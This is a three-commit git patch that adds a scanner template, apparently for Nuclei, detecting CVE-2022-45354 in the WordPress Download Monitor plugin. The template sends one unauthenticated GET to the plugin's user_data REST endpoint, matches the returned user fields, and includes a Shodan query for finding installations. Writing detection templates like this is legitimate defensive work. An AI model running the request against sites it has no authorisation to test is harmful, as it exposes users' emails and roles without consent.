From 5a2cd2b88ad6a245ebc0f52982fe32bea4c7a623 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 12 Jul 2023 01:24:50 +0530 Subject: [PATCH 1/3] Create CVE-2022-45354.yaml --- http/cves/2022/CVE-2022-45354.yaml | 39 ++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2022/CVE-2022-45354.yaml diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml new file mode 100644 index 00000000000..52833a2ba86 --- /dev/null +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-45354 + +info: + name: Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API + author: DhiyaneshDK + severity: medium + description: | + The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords) + reference: + - https://github.com/RandomRobbieBF/CVE-2022-45354 + - https://wordpress.org/plugins/download-monitor/ + metadata: + verified: true + shodan-query: html:"/wp-content/plugins/download-monitor/" + max-request: 1 + tags: cve,cve2023,wordpress,wp-plugin,download-monitor,wp + +http: + - method: GET + path: + - "{{BaseURL}}/wp-json/download-monitor/v1/user_data" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"registered":' + - '"display_name":' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 From 836fb614d57b500a39b16b25b1bddb7ec30f9368 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 12 Jul 2023 01:27:47 +0530 Subject: [PATCH 2/3] fix-template --- http/cves/2022/CVE-2022-45354.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index 52833a2ba86..ee6e7085f24 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -2,7 +2,7 @@ id: CVE-2022-45354 info: name: Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API - author: DhiyaneshDK + author: DhiyaneshDK severity: medium description: | The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords) From 7d70eaa50dba10f37f8498d80e494543f67e8c31 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 12 Jul 2023 11:47:34 +0530 Subject: [PATCH 3/3] Update CVE-2022-45354.yaml --- http/cves/2022/CVE-2022-45354.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index ee6e7085f24..9108a134623 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -1,7 +1,7 @@ id: CVE-2022-45354 info: - name: Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API + name: Download Monitor <= 4.7.60 - Sensitive Information Exposure author: DhiyaneshDK severity: medium description: |